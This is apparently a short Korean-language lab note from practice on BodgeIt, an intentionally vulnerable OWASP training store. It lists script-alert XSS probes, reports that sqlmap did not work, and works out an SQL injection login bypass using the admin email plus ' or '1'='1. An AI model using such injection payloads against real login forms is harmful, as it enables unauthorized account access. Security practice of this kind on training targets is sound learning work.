oswasp 실습(BodgeIt)

 

 

 

 

 

 

------------------------------

 

script 공격

 

<script>alert("taktaktaktak")</script>

 

 

 

 

 

<script>alert('taktaktak')</scirpt>

 

 

 

---------------------------------------

 

 

sqlmap은 적용이되지않는다.

 

 

 

 

 

---------------------------------

 

 

 

 

- ----------------------------

 

5글자를 넣으라고한다.

 

 

 

 

 

 

about us 

들어가서!

 

저것을복사해본다

 

 

admin@thebodgeitstore.com

 

 

 

 

 

 

 

admin@thebodgeitstore.com' or '1'='1'#

 

주석처리가 불가능하다

 

select * from user where username='--' and password=''

 

원래는 주석처리가되서 로그인이되면

 

이번것은

 

select * from user where

username='admin@thebodgeitstore.com' or '1'='1' and

password='aaaaa'

 

 

 

이렇게 추측을 한다.

5글자의 단서가 아니면 불가능한것이였다

 

 

 

 

 

 

admin@thebodgeitstore.com' or '1'='1

aaaa 

 

이렇게하게된다면

 

 

 

 

 

 

성공하였다!